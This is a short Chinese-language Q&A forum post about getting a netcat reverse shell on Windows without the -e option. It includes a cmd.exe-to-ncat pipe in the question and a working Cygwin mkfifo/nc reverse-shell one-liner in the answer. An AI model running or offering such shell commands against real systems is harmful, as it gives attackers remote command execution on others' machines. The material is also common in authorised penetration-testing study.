在 Windows 上使用 netcat 进行反向 shell(无 -e 选项)

在 Windows 上使用 netcat 进行反向 shell(无 -e 选项)

由于它会触发 UAC,有没有办法在 Windows 中使用 netcat 来获取反向 shell,而无需使用 -e 选项?

我使用命名管道使其在 Linux 和 Linux 之间运行。我想在 Windows 中实现类似的功能。

在 Windows 上运行会c:\windows\system32\cmd.exe | ncat -l -p 666在我连接时在 Linux 中给出提示:

# nc 192.168.0.109 666
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\user> dir

^C

看起来我已经很接近了,也许缺少了一些简单的东西?如果 Windows 中有命名管道就好了……

答案1

我不确定你是否可以使用纯 win32 netcat 来做到这一点,但你可以在 cygwin 中做到这一点。在 1234 上监听,然后nc -l 1234使用以下命令在单独的窗口中连接到它:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/cygdrive/c/windows/system32/cmd.exe 2>&1|nc 127.0.0.1 1234 >/tmp/f

请注意,使用此方法时,上下键无法循环浏览命令历史记录。

相关内容